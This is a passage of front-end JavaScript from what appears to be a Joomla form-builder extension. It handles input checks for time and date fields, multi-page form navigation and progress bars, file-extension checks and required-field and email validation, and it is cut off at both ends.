		input=document.getElementById(id);
		input.setAttribute("value", input.value);
	}
}

function check_hour(e, id, hour_interval)
{
   	var chCode1 = e.which || e.keyCode;
    	if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57))
        return false;
	hour=""+document.getElementById(id).value+String.fromCharCode(chCode1);

	hour=parseFloat(hour);
	if((hour<0) || (hour>hour_interval))
        	return false;
	return true;
} 

function check_minute(e, id)
{	
		
   	var chCode1 = e.which || e.keyCode;
    	if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57))
        return false;
	minute=""+document.getElementById(id).value+String.fromCharCode(chCode1);

	minute=parseFloat(minute);
	if((minute<0) || (minute>59))
        	return false;
	return true;
} 

function check_second(e, id)
{	
		
   	var chCode1 = e.which || e.keyCode;
    	if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57))
        return false;
	second=""+document.getElementById(id).value+String.fromCharCode(chCode1);

	second=parseFloat(second);
	if((second<0) || (second>59))
        	return false;
	return true;
}

function check_isnum_interval(e, id, from, to) {
  var chCode1 = e.which || e.keyCode;
  if (jQuery.inArray(chCode1,[46,8,9,27,13,190]) != -1 || e.ctrlKey === true || (chCode1 >= 35 && chCode1 < 39)) {
    return true;
  }
  if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57)) {
    return false;
  }
  val = "" + document.getElementById(id).value+String.fromCharCode(chCode1);
	if (val.length>2) {
    return false;
  }
  if (val == '00') {
    return false;
  }
	if ((val < from) || (val > to)) {
    return false;
  }
  return true;
}

function change_day(ev, id)
{
	if(check_day(ev, id))
	{
		input=document.getElementById(id);
		input.setAttribute("value", input.value);
	}
}

function change_month(ev, id)
{
	if(check_month(ev, id))
	{
		input=document.getElementById(id);
		input.setAttribute("value", input.value);
	}
}

function change_year(id)
{
	year=document.getElementById(id).value;
	
	from=parseFloat(document.getElementById(id).getAttribute('from'));
	to=parseFloat(document.getElementById(id).getAttribute('to'));
	
	year=parseFloat(year);
	
	if((year>=from) && (year<=to))
		document.getElementById(id).setAttribute("value", year);
	else
		document.getElementById(id).setAttribute("value", '');
}

function check_day(e, id)
{	
   	var chCode1 = e.which || e.keyCode;
    	if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57))
        return false;
	day=""+document.getElementById(id).value+String.fromCharCode(chCode1);

	if(day.length>2)
        	return false;
			
	if(day=='00')
        	return false;
			
	day=parseFloat(day);
	if((day<0) || (day>31))
        	return false;
	return true;
} 

function check_month(e, id)
{	
		
	
   	var chCode1 = e.which || e.keyCode;
    	if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57))
        return false;
	month=""+document.getElementById(id).value+String.fromCharCode(chCode1);
	
	if(month.length>2)
        	return false;
			
	if(month=='00')
        	return false;
			
	month=parseFloat(month);
	if((month<0) || (month>12))
        	return false;
	return true;
} 

function check_year1(e, id)
{	
   	var chCode1 = e.which || e.keyCode;
    	if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57))
        return false;

	year=""+document.getElementById(id).value+String.fromCharCode(chCode1);
	
	to=parseFloat(document.getElementById(id).getAttribute('to'));
	
	year=parseFloat(year);
	
	if(year>to)
        	return false;
	return true;
} 

function check_year2(id, str)
{
	year=document.getElementById(id).value;
	
	from=parseFloat(document.getElementById(id).getAttribute('from'));
	
	year=parseFloat(year);
	
	if(year<from)
	{
		document.getElementById(id).value='';
	}
}	
	

function delete_value(id)
{
	ofontStyle=document.getElementById(id).className;
	if(ofontStyle=="input_deactive")

	{

		document.getElementById(id).value="";

		destroyChildren(document.getElementById(id));
		document.getElementById(id).setAttribute("class", "input_active");
		document.getElementById(id).className='input_active';
	}

}

function return_value(id)
{

	input=document.getElementById(id);

	if(input.value=="")

	{
			input.value=input.title;

		input.setAttribute("value", input.title);
		input.className='input_deactive';
		input.setAttribute("class", 'input_deactive');

	}
}

function change_value(id) {
	input=document.getElementById(id);
	tag=input.tagName;
	if (tag == "TEXTAREA")	{
    input.innerHTML=input.value;
	}
	else {
    input.setAttribute("value", input.value);
  }
}

function change_value_for_total(id, form_id) {
  set_total_value(id, form_id);
}

function change_input_value(first_value, id)
{	
	input=document.getElementById(id);

	input.title=first_value;
	
if( window.getComputedStyle ) 
{
  ofontStyle = window.getComputedStyle(input,null).fontStyle;
} else if( input.currentStyle ) {
  ofontStyle = input.currentStyle.fontStyle;
}
	if(ofontStyle=="italic")

	{	

		input.value=first_value;

		input.setAttribute("value", first_value);

	}
}

function change_file_value(destination, id)
{	
	input=document.getElementById(id);
	input.setAttribute("value", destination);
}

function change_label(id, label)
{
	document.getElementById(id).innerHTML=label;
	document.getElementById(id).value=label;
}

function change_in_value(id, label)
{
	document.getElementById(id).setAttribute("value", label);
}

function destroyChildren(node)
{
  while (node.firstChild)
      node.removeChild(node.firstChild);
}

function generate_page_nav(id, form_id, form_view_count, form_view_max)
{
form_view=id;
page_nav=document.getElementById(form_id+'page_nav'+id);
destroyChildren(page_nav);
form_view_elemet=document.getElementById(form_id+'form_view'+id);

display_none_form_views_all(form_id);

generate_page_bar(id, form_id, form_view_count, form_view_max);

form_view_elemet.parentNode.style.display="";

if(form_view_elemet.parentNode.previousSibling && form_view_elemet.parentNode.previousSibling.previousSibling)
{
	if(form_view_elemet.parentNode.previousSibling.tagName=="TABLE")
		table=form_view_elemet.parentNode.previousSibling;
	else
		if(form_view_elemet.parentNode.previousSibling.previousSibling.tagName=="TABLE")
			table=form_view_elemet.parentNode.previousSibling.previousSibling;
		else
			table="none";
			
	if(table!="none")
	{
		if(!table.firstChild.tagName)
			table.removeChild(table.firstChild);


		previous_title		= form_view_elemet.getAttribute('previous_title');
		previous_type		= form_view_elemet.getAttribute('previous_type');
		previous_class		= form_view_elemet.getAttribute('previous_class');
		previous_checkable	= form_view_elemet.getAttribute('previous_checkable');
	
		next_or_previous="previous";

		previous=make_pagebreak_button(next_or_previous, previous_title, previous_type, previous_class, previous_checkable, id, form_id, form_view_count, form_view_max);
		var td = document.createElement("td");
			td.setAttribute("valign", "middle");
			td.setAttribute("align", "left");
		
		td.appendChild(previous);
		page_nav.appendChild(td);
	}
}


		var td = document.createElement("td");
			td.setAttribute("id", form_id+"page_numbers"+form_view);
			td.setAttribute("width", "100%");
			td.setAttribute("valign", "middle");
			td.setAttribute("align", "center");
if(document.getElementById(form_id+'pages').getAttribute('show_numbers')=="true")
{
		k=0;
		for(j=1; j<=form_view_max; j++)
		{
			if(document.getElementById(form_id+'form_view'+j))
			{
				k++;		
				if(j==form_view)
					page_number=k;
			}
		}
		
		var cur = document.createElement('span');
			cur.setAttribute("class", "page_numbers");
			cur.innerHTML=page_number+'/'+k;
		
		td.appendChild(cur);

}
		page_nav.appendChild(td);



not_next=false;
if(form_view_elemet.parentNode.nextSibling)
{
	if(form_view_elemet.parentNode.nextSibling.tagName=="TABLE")
		table=form_view_elemet.parentNode.nextSibling;
	else
		if(form_view_elemet.parentNode.nextSibling.nextSibling)
		{
			if(form_view_elemet.parentNode.nextSibling.nextSibling.tagName=="TABLE")
				table=form_view_elemet.parentNode.nextSibling.nextSibling;
			else
				table="none";
		}
			else
				table="none";
			
	if(table!="none")
	{
		next_title		=form_view_elemet.getAttribute('next_title');
		next_type		=form_view_elemet.getAttribute('next_type');
		next_class		=form_view_elemet.getAttribute('next_class');
		next_checkable	=form_view_elemet.getAttribute('next_checkable');
	
		next_or_previous="next";
	
		next=make_pagebreak_button(next_or_previous, next_title, next_type, next_class, next_checkable, id, form_id, form_view_count, form_view_max);
		var td = document.createElement("td");
			td.setAttribute("valign", "middle");
			td.setAttribute("align", "right");
		
		td.appendChild(next);
		page_nav.appendChild(td);
	}
	else
	{
		not_next=true;
	}
}
else
{
	not_next=true;
}

	for(x=0; x<parseInt(document.getElementById('counter'+form_id).value); x++)
		if(document.getElementById(x+'_type'+form_id))
		{
			if(document.getElementById(x+'_type'+form_id).value=="type_map")
			{
				if_gmap_init(x, form_id);
				for(q=0; q<20; q++)
					if(document.getElementById(x+"_element"+form_id).getAttribute("long"+q))
					{
					
						w_long=parseFloat(document.getElementById(x+"_element"+form_id).getAttribute("long"+q));
						w_lat=parseFloat(document.getElementById(x+"_element"+form_id).getAttribute("lat"+q));
						w_info=parseFloat(document.getElementById(x+"_element"+form_id).getAttribute("info"+q));
						add_marker_on_map(x,q, w_long, w_lat, w_info, form_id,false);
					}
			}
			
			if(document.getElementById(x+'_type'+form_id).value=="type_mark_map")
			{      	
			    if(!document.getElementById(x+'_long'+form_id))
                {
					var longit = document.createElement('input');
						longit.setAttribute("type", 'hidden');
						longit.setAttribute("id", x+'_long'+form_id);
						longit.setAttribute("name",x+'_long'+form_id);

					var latit = document.createElement('input');
						latit.setAttribute("type", 'hidden');
						latit.setAttribute("id",x+'_lat'+form_id);
						latit.setAttribute("name",x+'_lat'+form_id);
									
									
					document.getElementById(x+"_element_section"+form_id).appendChild(longit);
					document.getElementById(x+"_element_section"+form_id).appendChild(latit);

					w_long=parseFloat(document.getElementById(x+"_element"+form_id).getAttribute("long0"));
					w_lat=parseFloat(document.getElementById(x+"_element"+form_id).getAttribute("lat0"));
					w_info=document.getElementById(x+"_element"+form_id).getAttribute("info0");
                }
                else
                {
                    w_long=parseFloat(document.getElementById(x+"_long"+form_id).value);
					w_lat=parseFloat(document.getElementById(x+"_lat"+form_id).value);
					w_info=document.getElementById(x+"_element"+form_id).getAttribute("info0");
                }

                longit=document.getElementById(x+'_long'+form_id);
			    latit=document.getElementById(x+'_lat'+form_id);

				if_gmap_init(x, form_id);
				
				curpoint = new google.maps.LatLng(w_lat,w_long);

				gmapdata[x].setCenter(curpoint);

				longit.value=w_long;
				latit.value=w_lat;
				add_marker_on_map(x,0, w_long, w_lat, w_info, form_id, true);
				
			}
			
			
		}

}

function display_none_form_views_all(form_id)
{
	for(t=1; t<30; t++)
		if(document.getElementById(form_id+'form_view'+t))
			document.getElementById(form_id+'form_view'+t).parentNode.style.display="none";
}
function generate_page_bar(form_view, form_id, form_view_count, form_view_max)	
{	
		if(document.getElementById(form_id+'pages').getAttribute('type')=='steps')
				make_page_steps_front(form_view, form_id, form_view_count, form_view_max);
		else
			if(document.getElementById(form_id+'pages').getAttribute('type')=='percentage')
				make_page_percentage_front(form_view, form_id, form_view_count, form_view_max);
			else
				make_page_none_front(form_id);
		

		
		
		if(document.getElementById(form_id+'pages').getAttribute('type')=='show_numbers')		
		{		
			td = document.getElementById(form_id+'page_numbers'+form_view);
			if(td)	
			{	
				destroyChildren(td);
				k=0;
				for(j=1; j<=form_view_max; j++)
				{
					if(document.getElementById(form_id+'form_view'+j))
					{
						k++;		
						if(j==form_view)
							page_number=k;
					}
				}
				
				var cur = document.createElement('span');
					cur.setAttribute("class", "page_numbers");
					cur.innerHTML=page_number+'/'+k;
				
				td.appendChild(cur);
				}
		}
		else
		{	
			td = document.getElementById(form_id+'page_numbers'+form_view);
			if(td)	
			{	
				destroyChildren(document.getElementById(form_id+'page_numbers'+form_view));
			}
		}		
	}

function make_page_steps_front(form_view, form_id, form_view_count, form_view_max)
{
	destroyChildren(document.getElementById(form_id+'pages'));
	show_title			=(document.getElementById(form_id+'pages').getAttribute('show_title')=='true');
	next_checkable		=(document.getElementById(form_id+'form_view'+form_view).getAttribute('next_checkable')=='true');
	previous_checkable	=(document.getElementById(form_id+'form_view'+form_view).getAttribute('previous_checkable')=='true');
	
	k=0;
	for(j=1; j<=form_view_max; j++)
	{	
		if(document.getElementById(form_id+'form_view'+j))
			{
			if(document.getElementById(form_id+'form_view'+j).getAttribute('page_title'))
				w_pages=document.getElementById(form_id+'form_view'+j).getAttribute('page_title');
			else
				w_pages=""
			k++;
			
			page_number = document.createElement('span');
			page_number.setAttribute('id','page_'+j);
			if(j<form_view)
				if(previous_checkable)
					page_number.setAttribute('onClick','if(check('+form_view+', '+form_id+')) generate_page_nav("'+j+'", "'+form_id+'", "'+form_view_count+'", "'+form_view_max+'")');
				else
					page_number.setAttribute('onClick','generate_page_nav("'+j+'", "'+form_id+'", "'+form_view_count+'", "'+form_view_max+'")');
				
				
			if(j>form_view)
				if(next_checkable)
					page_number.setAttribute('onClick','if(check('+form_view+', '+form_id+')) generate_page_nav("'+j+'", "'+form_id+'", "'+form_view_count+'", "'+form_view_max+'")');
				else			
					page_number.setAttribute('onClick','generate_page_nav("'+j+'", "'+form_id+'", "'+form_view_count+'", "'+form_view_max+'")');
			
			
			if(j==form_view)
				page_number.setAttribute('class',"page_active");
			else
				page_number.setAttribute('class',"page_deactive");
			if(show_title)
			{
				page_number.innerHTML=w_pages;
			}
			else
				page_number.innerHTML=k;
			
			document.getElementById(form_id+'pages').appendChild(page_number);
		}
	}

}

function make_page_percentage_front(form_view, form_id, form_view_count, form_view_max)
{
	destroyChildren(document.getElementById(form_id+'pages'));
	show_title=(document.getElementById(form_id+'pages').getAttribute('show_title')=='true');
	
    var div_parent = document.createElement('div');
       	div_parent.setAttribute("class", "page_percentage_deactive");

    var div = document.createElement('div');
       	div.setAttribute("id", "div_percentage");
       	div.setAttribute("class", "page_percentage_active");
       	div.setAttribute("align", "right");
		
	var b = document.createElement('span');
       	b.setAttribute("class", "wdform_percentage_text");
	div.appendChild(b);
	
	k=0;
	cur_page_title='';
	for(j=1; j<=form_view_max; j++)
	{	
		if(document.getElementById(form_id+'form_view'+j))
			{
			if(document.getElementById(form_id+'form_view'+j).getAttribute('page_title'))
				w_pages=document.getElementById(form_id+'form_view'+j).getAttribute('page_title');
			else
				w_pages=""
			k++;
				
			if(j==form_view)
			{
				if(show_title)
				{ 
					var cur_page_title = document.createElement('span');
						cur_page_title.innerHTML=w_pages;
						
					cur_page_title.innerHTML=w_pages;										
					cur_page_title.setAttribute("class", "wdform_percentage_title");
				}
				page_number=k;

			}
		}
	}
	b.innerHTML=Math.round(((page_number-1)/k)*100)+'%';
	div.style.width=((page_number-1)/k)*100+'%';
	div_parent.appendChild(div);
	if(cur_page_title)
		div_parent.appendChild(cur_page_title);
	document.getElementById(form_id+'pages').appendChild(div_parent);

	
}

function make_page_none_front(form_id)
{
	destroyChildren(document.getElementById(form_id+'pages'));
}

function make_pagebreak_button(next_or_previous,title,type, class_, checkable, id, form_id, form_view_count, form_view_max)
{
	switch(type)
	{
		case 'button': 
		{ 
		
			var element = document.createElement('button');
				element.setAttribute('id', "page_"+next_or_previous+"_"+id);
				element.setAttribute('type', "button");
				element.setAttribute('class', class_);
        element.style.cursor = "pointer";
				if(checkable=="true")
					element.setAttribute('onClick', "if(check("+id+", "+form_id+" )) page_"+next_or_previous+"("+id+","+form_id+","+form_view_count+","+form_view_max+")");
				else
					element.setAttribute('onClick', "page_"+next_or_previous+"("+id+","+form_id+","+form_view_count+","+form_view_max+")");
				element.innerHTML=title;
				
			return element;
			
			break;
		}
		case 'text': {	
			
			var element = document.createElement('span');
				element.setAttribute('id', "page_"+next_or_previous+"_"+id);
				element.setAttribute('class', class_);
        element.style.cursor="pointer";
				if(checkable=="true")
					element.setAttribute('onClick', "if(check("+id+", "+form_id+")) page_"+next_or_previous+"("+id+","+form_id+","+form_view_count+","+form_view_max+")");
				else
					element.setAttribute('onClick', "page_"+next_or_previous+"("+id+","+form_id+","+form_view_count+","+form_view_max+")");
				element.innerHTML=title;
				
			return element;
			
			break;
		}
		case 'img':{ 			
		
			var element = document.createElement('img');
				element.setAttribute('id', "page_"+next_or_previous+"_"+id);
				element.setAttribute('class', class_);
        element.style.cursor="pointer";
				if(checkable=="true")
					element.setAttribute('onClick', "if(check("+id+", "+form_id+")) page_"+next_or_previous+"("+id+","+form_id+","+form_view_count+","+form_view_max+")");
				else
					element.setAttribute('onClick', "page_"+next_or_previous+"("+id+","+form_id+","+form_view_count+","+form_view_max+")");
				if(title.indexOf("http")==0)
				{
					element.src=title;
				}
				else
					element.src=JURI_ROOT+"/administrator/"+title;
				
			return element;
			
			break;
		}
	}
}

function page_previous(id, form_id, form_view_count, form_view_max)
{
	form_view_elemet=document.getElementById(form_id+'form_view'+id);
	if(form_view_elemet.parentNode.previousSibling && form_view_elemet.parentNode.previousSibling.previousSibling)
	{
	if(form_view_elemet.parentNode.previousSibling.tagName=="TABLE")
		table=form_view_elemet.parentNode.previousSibling;
	else
		table=form_view_elemet.parentNode.previousSibling.previousSibling;
	}
	if(!table.firstChild.tagName)
		table.removeChild(table.firstChild);

	generate_page_nav(table.firstChild.id.replace(form_id+'form_view', ""),form_id, form_view_count, form_view_max);
	window.scroll(0, form_maker_findPos(document.getElementById("form" + form_id)));
}

function page_next(id, form_id, form_view_count, form_view_max)
{
	form_view_elemet=document.getElementById(form_id+'form_view'+id);
	if(form_view_elemet.parentNode.nextSibling)
	{
	if(form_view_elemet.parentNode.nextSibling.tagName=="TABLE")
		table=form_view_elemet.parentNode.nextSibling;
	else
		table=form_view_elemet.parentNode.nextSibling.nextSibling;
	}
	if(!table.firstChild.tagName)
		table.removeChild(table.firstChild);

	generate_page_nav(table.firstChild.id.replace(form_id+'form_view', ""), form_id, form_view_count, form_view_max);
	window.scroll(0, form_maker_findPos(document.getElementById("form" + form_id)));
}

function form_maker_findPos(obj) {
  var curtop = 0;
  if (obj.offsetParent) {
    do {
        curtop += obj.offsetTop;
    } while (obj = obj.offsetParent);
  return [curtop];
  }
}

function randomSort(a,b) {
    return( parseInt( Math.random()*10 ) %2 );
}

function choises_randomize(id, form_id)
{
ot=-1;
j_array=new Array;
for(j=0; j<100; j++)
	if(document.getElementById(id+"_element"+form_id+j))
		{
			if(document.getElementById(id+"_element"+form_id+j).getAttribute("other"))
				if(document.getElementById(id+"_element"+form_id+j).getAttribute("other")==1)
				{	ot=j; continue;}
			j_array.push(j);
		}
j_array.sort(randomSort);


parent_=document.getElementById(id+"_element"+form_id+j_array[0]).parentNode.parentNode.parentNode;

for(j=0; j<j_array.length; j++)
	parent_.appendChild(document.getElementById(id+"_element"+form_id+j_array[j]).parentNode.parentNode);
	
if(ot!=-1)	
	parent_.appendChild(document.getElementById(id+"_element"+form_id+ot).parentNode.parentNode);

}
	
function remove_add_(id)
{
attr_name= new Array();
attr_value= new Array();
var input = document.getElementById(id); 
atr=input.attributes;
for(v=0;v<30;v++)
	if(atr[v] )
	{
		if(atr[v].name.indexOf("add_")==0)
		{
			attr_name.push(atr[v].name.replace('add_',''));
			attr_value.push(atr[v].value);
			input.removeAttribute(atr[v].name);
			v--;
		}
	}
for(v=0;v<attr_name.length; v++)
{
	input.setAttribute(attr_name[v],attr_value[v])
}

}

function getRadioCheckedValue(radio_name) {
  var id = '';
  var oRadio = document.getElementsByName(radio_name);
  for (var i = 0; i < oRadio.length; i++) {
    if (oRadio[i].checked) {
      id = oRadio[i].id;
      break;
    }
  }
  return id.replace('element', 'elementlabel_');
}
	
function getfileextension(id, form_id) 
{ 

 var fileinput = document.getElementById(id+"_element"+form_id); 
 var filename = fileinput.value; 
 if( filename.length == 0 ) 
 return true; 
 var dot = filename.lastIndexOf("."); 
 var extension = filename.substr(dot+1,filename.length); 
 var exten = document.getElementById(id+"_extension").value.replace("***extensionverj"+id+"***", "").replace("***extensionskizb"+id+"***", "");
 exten=exten.split(',');
 
 for(x=0 ; x<exten.length; x++)
 {
  exten[x]=exten[x].replace(/\./g,'');
  exten[x]=exten[x].replace(/ /g,'');
  if(extension.toLowerCase()==exten[x].toLowerCase())
  	return true;
 }
 return false; 
} 

	
function check_required(but_type, form_id) {
	if (but_type == 'reset') {
		if (window.before_reset) {
			before_reset();
		}
		window.location = "";
		return;
	}
	if (window.before_submit) {
		before_submit();
	}
  var ReqFieldMsg = eval("ReqFieldMsg_" + form_id);
  var REQUEST_URI = eval("REQUEST_URI_" + form_id);
  var WDF_INVALID_GRADING = eval("WDF_INVALID_GRADING_" + form_id);
	n = parseInt(document.getElementById('counter'+form_id).value);
	ext_available=true;
	seted = true;
	for (i = 0; i <= n; i++) {	
		if (seted) {
			if (document.getElementById(i+"_type"+form_id))
			    if(document.getElementById(i+"_required"+form_id))
				if(document.getElementById(i+"_required"+form_id).value=="yes")
				{
					type=document.getElementById(i+"_type"+form_id).value;
					switch(type)
					{
						case "type_text":
						case "type_number":
						case "type_password":
						case "type_submitter_mail":
						case "type_own_select":
            case "type_paypal_select":
						case "type_country":
							{
								if(document.getElementById(i+"_element"+form_id).value==document.getElementById(i+"_element"+form_id).title || document.getElementById(i+"_element"+form_id).value=="")
									seted=false;
									break;
							}
							
						case "type_file_upload":
							{
								if(document.getElementById(i+"_element"+form_id).value=="")
								{	
									seted=false;
									break;
								}
								ext_available=getfileextension(i,form_id);
								if(!ext_available)
									seted=false;
											
									break;
							}
							
						case "type_textarea":
							{
								if(document.getElementById(i+"_element"+form_id).innerHTML==document.getElementById(i+"_element"+form_id).title || document.getElementById(i+"_element"+form_id).innerHTML=="")
									seted=false;
									break;
							}
							
						case "type_name":
							{	
							if(document.getElementById(i+"_element_title"+form_id))
								{
									if(document.getElementById(i+"_element_title"+form_id).value=="" || document.getElementById(i+"_element_first"+form_id).value=="" || document.getElementById(i+"_element_last"+form_id).value=="" || document.getElementById(i+"_element_middle"+form_id).value=="" ||   document.getElementById(i+"_element_first"+form_id).value==document.getElementById(i+"_element_first"+form_id).title || document.getElementById(i+"_element_last"+form_id).value==document.getElementById(i+"_element_last"+form_id).title ||   document.getElementById(i+"_element_title"+form_id).value==document.getElementById(i+"_element_title"+form_id).title || document.getElementById(i+"_element_middle"+form_id).value==document.getElementById(i+"_element_middle"+form_id).title)
										seted=false;
								}
								else
								{
									if(document.getElementById(i+"_element_first"+form_id).value=="" || document.getElementById(i+"_element_last"+form_id).value=="" ||   document.getElementById(i+"_element_first"+form_id).value==document.getElementById(i+"_element_first"+form_id).title || document.getElementById(i+"_element_last"+form_id).value==document.getElementById(i+"_element_last"+form_id).title)
										seted=false;
								}
								break;
	
							}
							
						case "type_phone":
							{	
								if(document.getElementById(i+"_element_first"+form_id).value=="" || document.getElementById(i+"_element_last"+form_id).value=="" ||   document.getElementById(i+"_element_first"+form_id).value==document.getElementById(i+"_element_first"+form_id).title || document.getElementById(i+"_element_last"+form_id).value==document.getElementById(i+"_element_last"+form_id).title)
									seted=false;
								break;
	
							}
							
						case "type_address":
							{	
								if ((document.getElementById(i+"_street1"+form_id) && document.getElementById(i+"_street1"+form_id).value=="" && jQuery("#" + i+"_street1"+form_id).attr("type") != "hidden") || (document.getElementById(i+"_city"+form_id) && document.getElementById(i+"_city"+form_id).value=="" && jQuery("#" + i+"_city"+form_id).attr("type") != "hidden") || (document.getElementById(i+"_state"+form_id) && document.getElementById(i+"_state"+form_id).value==""&& jQuery("#" + i+"_state"+form_id).attr("type") != "hidden") || (document.getElementById(i+"_postal"+form_id) && document.getElementById(i+"_postal"+form_id).value==""&& jQuery("#" + i+"_city"+form_id).attr("type") != "hidden") || (document.getElementById(i+"_postal"+form_id) && document.getElementById(i+"_country"+form_id).value==""&& jQuery("#" + i+"_country"+form_id).attr("type") != "hidden")) {
                  seted=false;
                }
								break;
	
							}
            case "type_paypal_checkbox":
						case "type_checkbox":
            case "type_paypal_radio":
						case "type_radio":
            case "type_paypal_shipping":
							{
								is=true;
								for(j=0; j<100; j++)
									if(document.getElementById(i+"_element"+form_id+j))
										if(document.getElementById(i+"_element"+form_id+j).checked)
										{
											is=false;										
											break;
										}
								if(is)
								seted=false;
								break;
							}
            case "type_star_rating":
							{	
								if(document.getElementById(i+"_selected_star_amount"+form_id).value=="")
										seted=false;
									break;		
						    }	

								case "type_scale_rating":
							{
						
								var scale_radio_checked=false;
								for(var k=1; k<100; k++){
								if(document.getElementById(i+"_scale_radio"+form_id+"_"+k)){
								
									if(document.getElementById(i+"_scale_radio"+form_id+"_"+k).checked==true)
									scale_radio_checked=true;
								}
								}	
					
								if(scale_radio_checked==false)
										seted=false;
									break;		
						    
							}
							case "type_spinner":
							{
						
								if(!document.getElementById(i+"_element"+form_id).getAttribute('aria-valuenow'))
										seted=false;
									break;		
						    }
							case "type_slider":
							{
						
								if(document.getElementById(i+"_slider_value"+form_id).value==document.getElementById(i+"_slider_min_value"+form_id).value)
										seted=false;
									break;		
						    }
							case "type_range":
							{
						
								if(!document.getElementById(i+"_element"+form_id+"0").getAttribute('aria-valuenow') && !document.getElementById(i+"_element"+form_id+"1").getAttribute('aria-valuenow'))
										seted=false;
									break;		
						    }
								case "type_grading":
							{
						
					        var grading_input=false;
					     	for(var k=0; k<100; k++){
							if(document.getElementById(i+"_element"+form_id+k)){
							
								if(document.getElementById(i+"_element"+form_id+k).value!="")
								grading_input=true;
							}
                            }	
					
								if(grading_input==false)
										seted=false;
									break;		
						    
							}
							
							case "type_matrix":
							{
						
								if(document.getElementById(i+"_input_type"+form_id).value=='radio' || document.getElementById(i+"_input_type"+form_id).value=='checkbox')
								{
								var radio_checked=false;
								for(var k=1;k<=100;k++){
								    for(var j=1;j<=100;j++)
									{
									if(document.getElementById(i+"_input_element"+form_id+k+"_"+j)){
									
									if(document.getElementById(i+"_input_element"+form_id+k+"_"+j).checked==true)
									{
									
									radio_checked=true;
									}
									}
									}
								}
								if(radio_checked==false)
								seted=false;
									
								}
								else
								{
								if(document.getElementById(i+"_input_type"+form_id).value=='text')
								{
								var checked=false;
								for(var k=1;k<=100;k++){
								    for(var j=1;j<=100;j++)
									{
									if(document.getElementById(i+"_input_element"+form_id+k+"_"+j)){
									
									if(document.getElementById(i+"_input_element"+form_id+k+"_"+j).value!="")
									{
									checked=true;
									}
									}
									}
								}
								if(checked==false)
								seted=false;
									
								}
								else
								{
								var checked=false;
								for(var k=1;k<=100;k++){
								    for(var j=1;j<=100;j++)
									{
									if(document.getElementById(i+"_select_yes_no"+form_id+k+"_"+j)){
									
									if(document.getElementById(i+"_select_yes_no"+form_id+k+"_"+j).value!="")
									{
									checked=true;
									}
									}
									}
								}
								if(checked==false)
								seted=false;
									
								
								}
								
								}
								break;	
		
									
						    }
							
						case "type_time":
							{	
							if(document.getElementById(i+"_ss"+form_id))
								{
									if(document.getElementById(i+"_ss"+form_id).value=="" || document.getElementById(i+"_mm"+form_id).value=="" || document.getElementById(i+"_hh"+form_id).value=="")
										seted=false;
								}
								else
								{
									if(document.getElementById(i+"_mm"+form_id).value=="" || document.getElementById(i+"_hh"+form_id).value=="")
										seted=false;
								}
								break;
	
							}
							
						case "type_date":
							{	
								if(document.getElementById(i+"_element"+form_id).value=="")
									seted=false;
								break;
							}
						case "type_date_fields":
							{	
								if(document.getElementById(i+"_day"+form_id).value=="" || document.getElementById(i+"_month"+form_id).value=="" || document.getElementById(i+"_year"+form_id).value=="")
									seted=false;
								break;
							}
            case "type_paypal_price":
							{	
								if(document.getElementById(i+"_element_dollars"+form_id).value=="" ||   document.getElementById(i+"_element_dollars"+form_id).value==document.getElementById(i+"_element_dollars"+form_id).title)
									seted=false;
								break;
							}
					}	
					
				}
				else
				{	
					type=document.getElementById(i+"_type"+form_id).value;
					if(type=="type_file_upload")
						ext_available=getfileextension(i, form_id);
							if(!ext_available)
							seted=false;
											
				}
      if (document.getElementById(i+"_type"+form_id)) {
				if (document.getElementById(i+"_type"+form_id).value=="type_grading") {
					if (parseInt(document.getElementById(i+"_sum_element"+form_id).innerHTML) > parseInt(document.getElementById(i+"_total_element"+form_id).innerHTML)) {
            alert(WDF_INVALID_GRADING + ' ' + document.getElementById(i+'_total_element'+form_id).innerHTML);
            return;
					}
				}
      }
		}
		else
		{
		
			if(!ext_available)
				{alert(WDF_FILE_TYPE_ERROR);
				break;}
			
			x=document.getElementById(i-1+'_element_label'+form_id);
			while(x.firstChild)
			{
				x=x.firstChild;
			}
			alert(ReqFieldMsg.replace('`FIELDNAME`', '"'+x.nodeValue+'" '));
			
			break;
		}
		
	}
	if(seted)
	for(i=0; i<=n; i++)
	{	
		if(document.getElementById(i+"_type"+form_id))
			if(document.getElementById(i+"_type"+form_id).value=="type_submitter_mail")
				if (document.getElementById(i+"_element"+form_id).value!='' && document.getElementById(i+"_element"+form_id).value.search(/^\w+((-\w+)|(\.\w+))*\@[A-Za-z0-9]+((\.|-)[A-Za-z0-9]+)*\.[A-Za-z0-9]+$/) == -1)
				{
							alert(WDF_INVALID_EMAIL);	
							return;
				}		

	}

	if(seted)
		create_headers(form_id);
	
}

function form_maker_getElementsByAttribute(node,tag,attr,value){
  var elems = (tag=="*" && node.all) ? node.all : node.getElementsByTagName(tag),
    returnElems = new Array(),
    nValue = (typeof value!="undefined") ? new RegExp("(^|\\s)" + value + "(\\s|$)") : null,
    nAttr,
    cur;
  for (var i = 0; i < elems.length; i++) {
    cur = elems[i];
    nAttr = cur.getAttribute && cur.getAttribute(attr);
    if (typeof nAttr == "string" && nAttr.length > 0) {
      if (typeof value == "undefined" || (nValue && nValue.test(nAttr))) {
        returnElems.push(cur);
      }
    }
  }
  return returnElems;
}
	
function check(id, form_id)
{
  var ReqFieldMsg = eval("ReqFieldMsg_" + form_id);
	n=parseInt(document.getElementById("counter"+form_id).value);
	form_view_curren=document.getElementById(form_id+"form_view"+id);
	ext_available=true;
	seted=true;
	for(i=0; i<=n; i++)
	{	
		if(seted)
		{
      if (form_maker_getElementsByAttribute(form_view_curren, "*", "id", "" + i + "_type" + form_id + "") != '')
			    if(document.getElementById(i+"_required"+form_id))
				if(document.getElementById(i+"_required"+form_id).value=="yes")
				{
					type=document.getElementById(i).getAttribute("type");
					switch(type)
					{
						case "type_text":
						case "type_number":
						case "type_password":
						case "type_submitter_mail":
						case "type_own_select":
						case "type_country":
							{
								if(document.getElementById(i+"_element"+form_id).value==document.getElementById(i+"_element"+form_id).title || document.getElementById(i+"_element"+form_id).value=="")
									seted=false;
									break;
							}
							
						case "type_file_upload":
							{
								if(document.getElementById(i+"_element"+form_id).value=="")
								{	
									seted=false;
									break;
								}
								ext_available=getfileextension(i, form_id);
								if(!ext_available)
									seted=false;
											
									break;
							}
							
